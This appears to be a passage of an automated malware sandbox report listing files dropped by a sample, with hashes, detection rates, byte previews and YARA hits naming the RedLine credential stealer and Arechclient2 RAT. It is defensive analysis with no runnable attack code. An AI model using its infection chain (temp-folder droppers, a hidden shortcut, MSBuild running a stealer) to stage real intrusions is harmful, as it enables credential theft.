Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\88194644

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.739001923261411
Encrypted:	false
SSDEEP:	24576:zimFYgP0fddhDd9SvrHMlD5MkBTYPFgR9+QFDYak9ej+MsVptIHtW9sQyiQSdD4D:FFIXtSvQP9LFDYh9ej+MwptGUjzD4D
MD5:	654E740F1E3BBBA9A8728703D82E7DEC
SHA1:	9DCBF813C6387904C072101BC62B1570513E271F
SHA-256:	1967801E6718486A739C6ADBCE59223BAB4320476061F7C75179FADAF0E773AE
SHA-512:	F617F4D5A83D6D93347FEEBF112B0F2C3069468E7774D91B29D18971E2DCC7259767F91D25E8E06B8B502D956B30B2712DECA52267122A4D9C91C43243192015
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E...A..X...z...a...{...f...t...X...I...r...f...t...e.............................................\...\|...o.........................................................................................V...a...f...v......................................................................................\...G..\|...f...;...I...x...g......................................................................;...%.............................................

C:\Users\user\AppData\Local\Temp\95dda64a

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.739002653072595
Encrypted:	false
SSDEEP:	24576:5imFYgP0fddhDd9SvrHMlD5MkBTYPFgR9+QFDYak9ej+MsVptIHtW9sQyiQSdD4D:jFIXtSvQP9LFDYh9ej+MwptGUjzD4D
MD5:	178F6E0145510F80623911EA1FC5F4A2
SHA1:	449D268EBA22672BC37D02BFFC908220A14F58C7
SHA-256:	4D683EB1D5857970E954BF4E06E66D02AD10AFE900C5E9C527A3401EF6090DD7
SHA-512:	51D2C608BEF194B022EBE1A529E260676071B4DB24040ABCFA0EA1B850B129D2B7A2E52924E80E680749CCD1567FB6A337AF300F88797B5DBA44E057F8E430DC
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E...A..X...z...a...{...f...t...X...I...r...f...t...e.............................................\...\|...o.........................................................................................V...a...f...v......................................................................................\...G..\|...f...;...I...x...g......................................................................;...%.............................................

C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hdpinc

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu Apr 25 09:16:13 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.014825628826934
Encrypted:	false
SSDEEP:	24:85pmCJjP6gIzR84gK1kUzry0yAAfpys2rkh6LIqyFm:86CJjijR8URkKkwLRyF
MD5:	DD3C37B8EB76B1BD2866433A48D0351E
SHA1:	BF048A1A033E1D19AC886628DBC8508772453EBD
SHA-256:	4CA246A89AA1F8B3DB2AF2CC70BCDA0829130829C9645AE6E16DF3F7D7D25ADC
SHA-512:	ED38412F75FA6D7BF2E9BFA05134E21D1DA9DFE57ECF9FBC7373D1404CAF1B1CA0D2A097C1A6EB749342B663B1CEADE72F7614922C8E2F4DD3794FDDC09613B2
Malicious:	false
Preview:	L..................F.... ....Z.!....{Q.......Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....V.....i.[.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.Q...........................%..A.p.p.D.a.t.a...B.P.1......X.Q..Local.<......CW.^.X.Q....b.......................}.L.o.c.a.l.....N.1......X.R..Temp..:......CW.^.X.R....l.......................j.T.e.m.p.....T.1......X.R..u5g0.2..>......X.R.X.R....D.......................q.u.5.g.0...2.....V.2.0.%..X./ .run.exe.@......X./.X.R.............................r.u.n...e.x.e......._...............-.......^...........`Q.l.....C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe......\.u.5.g.0...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......609290...........hT..CrF.f4... .l.T..b...,.......hT..CrF.f4... .l.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4718
Entropy (8bit):	5.490296013905726
Encrypted:	false
SSDEEP:	96:fQ5CsNuyroo/LhJ+Cr+JmJHJvJbJfJPJoJYJKJyelPulPulPuQPuQPu/Pu/Pu6Pt:fQUKLx/LhJ+Cr+JmJHJvJbJfJPJoJYJc
MD5:	18A6C271A8DDDD68CA2970C307FDCDDD
SHA1:	9B0C922C831C9969BE098306DDE5A190A495FB23
SHA-256:	36500B0A4CB64633BA0D6C77799AB6555C307CE0B02282DBB004952A1073BC75
SHA-512:	30483A36E618C9F0A3687B9CF4B0B5AB457362F7CE152D8C8A212BCC95C16F85814B91698D43F6FD15AAC789A825C08EA6DC8FAF4BE58404719BA5C8F8FCFD64
Malicious:	false
Preview:	[04/25/24 12:16:17] Main : OS Version = osWin10...[04/25/24 12:16:17] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/25/24 12:16:17] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/25/24 12:16:18] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/25/24 12:16:18] DownloadAndLaunchInstaller : Creating BITS download handler...[04/25/24 12:16:18] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/25/24 12:16:23] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/25/24 12:16:23] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\phtshfcnnluilu

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\qbji

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\qbji, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\qbji, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\qbji, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmp917D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	285696
Entropy (8bit):	5.720154696605982
Encrypted:	false
SSDEEP:	3072:4O12AmoncLbvqF4WicTWE82dtcG/MAbqyf8p5q8+vGwz:4qSqV182d6EX8+OG
MD5:	19DF99C6ABEF7763427C6E25F42D5D69
SHA1:	5CB8F62D3645871185194693136E8BD4EB931CB5
SHA-256:	DC4D4FC8DB5EB4646AD9CAED3135E86655F5B7A08556BD7D2134CD73719B7A22
SHA-512:	883589E6A02E468F18B3A1A3FEF5589CF1673E81D5D8008472EBDE2B65456C0D8A61B78C1273349E1E9040C08991D4031850A36D471C54E3978C2ABF9CF88580
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#/4.gNZ.gNZ.gNZ.y..vNZ.y...NZ.y..KNZ.@.!.bNZ.gN[..NZ.y..fNZ.y..fNZ.y..fNZ.RichgNZ.........................PE..L...C.vd............................p.............@.........................................................................^..<.......`............................................................................................................text...c........................... ..`.rdata..............................@..@.data....#~..p...*...P..............@....rsrc...`............z..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5g0.1.zip

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u5g0.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5g0.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u5g0.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5g0.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
